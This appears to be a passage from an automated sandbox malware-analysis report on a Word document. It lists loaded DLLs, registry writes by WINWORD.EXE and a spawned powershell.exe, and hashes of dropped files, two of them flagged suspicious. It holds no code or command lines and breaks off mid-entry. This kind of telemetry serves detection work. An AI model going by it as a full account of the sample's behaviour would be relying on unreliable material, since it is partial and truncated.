c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\fveui.dll
c:\windows\system32\qagentrt.dll
c:\windows\system32\p2pcollab.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
950
Read events
746
Write events
204
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1041
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1046
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1031
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1049
Off
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
3082
Off
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1333919806
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1333919924
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources
UISnapshot
1033;1046;1036;1031;1040;1041;1049;3082;1042;1055
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources
UIFallback
1040;0;1033;1046;1036;1031;1041;1049;3082;1042;1055
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources
HelpFallback
0;1033;1046;1036;1031;1040;1041;1049;3082;1042;1055
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1046
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1031
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1041
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1049
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
3082
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1042
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1055
On
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{0C12CF48-451D-45AC-A927-F5FDBFC07C96}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{9C3CFE2A-537A-479A-A1E2-85728C400F7D}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{A8716C2B-35ED-4EE7-A138-FBA0A7C9B5B0}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{AA3BD3AB-AD94-4243-86C5-8AE3D7D829BC}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Recognizers\{BC29864C-2254-4A9E-9F4D-721A388618BB}
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\User Settings\Kosmarttag_SmartTag
Count
1
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1333919925
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage
StemmerFiles_1042
1333919745
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
B00200008E13CF3A56A9D50100000000
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
}xh
7D786800B002000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
(yh
28796800B002000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{2FC354D3-0224-409F-8B07-2B0917CC6987}\2.0
Microsoft Forms 2.0 Object Library
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{2FC354D3-0224-409F-8B07-2B0917CC6987}\2.0\FLAGS
6
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{2FC354D3-0224-409F-8B07-2B0917CC6987}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{2FC354D3-0224-409F-8B07-2B0917CC6987}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\Word8.0
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
688
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\38E80E
38E80E
04000000B00200006600000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0066003500320031003500340063003800630031003100650034003800620063003400380063003400310062006200380034006300390066003000390039003300310062003500300065003200660037003300650032006600610063006200350062003800380038003400300032006100390061006100650030003500610033002E0064006F0063004400000066003500320031003500340063003800630031003100650034003800620063003400380063003400310062006200380034006300390066003000390039003300310062003500300065003200660037003300650032006600610063006200350062003800380038003400300032006100390061006100650030003500610033002E0064006F006300000000000100000000000000268AC53A56A9D5010EE838000EE8380000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
0}h
307D6800B00200000600000001000000DE00000002000000CE0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0066003500320031003500340063003800630031003100650034003800620063003400380063003400310062006200380034006300390066003000390039003300310062003500300065003200660037003300650032006600610063006200350062003800380038003400300032006100390061006100650030003500610033002E0064006F006300000000000000
688
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1333919751
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 2
[F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D2FDCA97E47500][O00000000]*C:\Users\admin\Desktop\startedhis.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 2
[F00000000][T01D5283E319B0580][O00000000]*C:\Users\admin\Desktop\ringeven.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 3
[F00000000][T01D55414AFD17180][O00000000]*C:\Users\admin\Desktop\costlearning.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 4
[F00000000][T01D438F4123F0E80][O00000000]*C:\Users\admin\Desktop\purposeaddition.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 5
[F00000000][T01D294D057076780][O00000000]*C:\Users\admin\Desktop\rssport.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 6
[F00000000][T01D2F8535C347000][O00000000]*C:\Users\admin\Documents\makeswall.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 7
[F00000000][T01D280B6AE184B00][O00000000]*C:\Users\admin\Documents\campustax.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 8
[F00000000][T01D4221667516400][O00000000]*C:\Users\admin\Documents\sortvisual.rtf
688
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
uvh
75766800B0020000010000000000000000000000
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
LanguageList
en-US
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
1036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\system32\p2pcollab.dll,-8042
Peer to Peer Trust
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\System32\fveui.dll,-844
BitLocker Data Recovery Agent
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\system32\dnsapi.dll,-103
Domain Name System (DNS) Server Trust
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\system32\qagentrt.dll,-10
System Health Authentication
1036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
@%SystemRoot%\System32\fveui.dll,-843
BitLocker Drive Encryption

Files activity

Executable files
0
Suspicious files
2
Text files
1
Unknown types
11

Dropped files

PID
Process
Filename
Type
1036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF38ea6f.TMP
binary
MD5: 35375f3d71ae42aa9777154d256b33bf
SHA256: bcff55e0934722e7952ea75d73ae7ce376e4adbc73de5e71d629975e9eac87ef
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5824C177.wmf
wmf
MD5: 6369dcbb9780f8b3777ed0d8a34d26dd
SHA256: cede734bacc958bac2dfbcd2f63ed317ac12347a8bcb644a77bec9ab4d7c4862
1036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 35375f3d71ae42aa9777154d256b33bf
SHA256: bcff55e0934722e7952ea75d73ae7ce376e4adbc73de5e71d629975e9eac87ef
1036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MWXKZHAO4D1PUA6IY3C.temp
––
MD5:  ––
SHA256:  ––
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68EBE19D.wmf
wmf
MD5: 4a02eddd33572b75f460175c3e140d78
SHA256: 44cb4d823d4940d00aa90428866a1b450b006af2105f9d83c5cec0ced588be6a
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E3DC2B3.wmf
wmf
MD5: 6b736ab00b45eff5ced357ade435414b
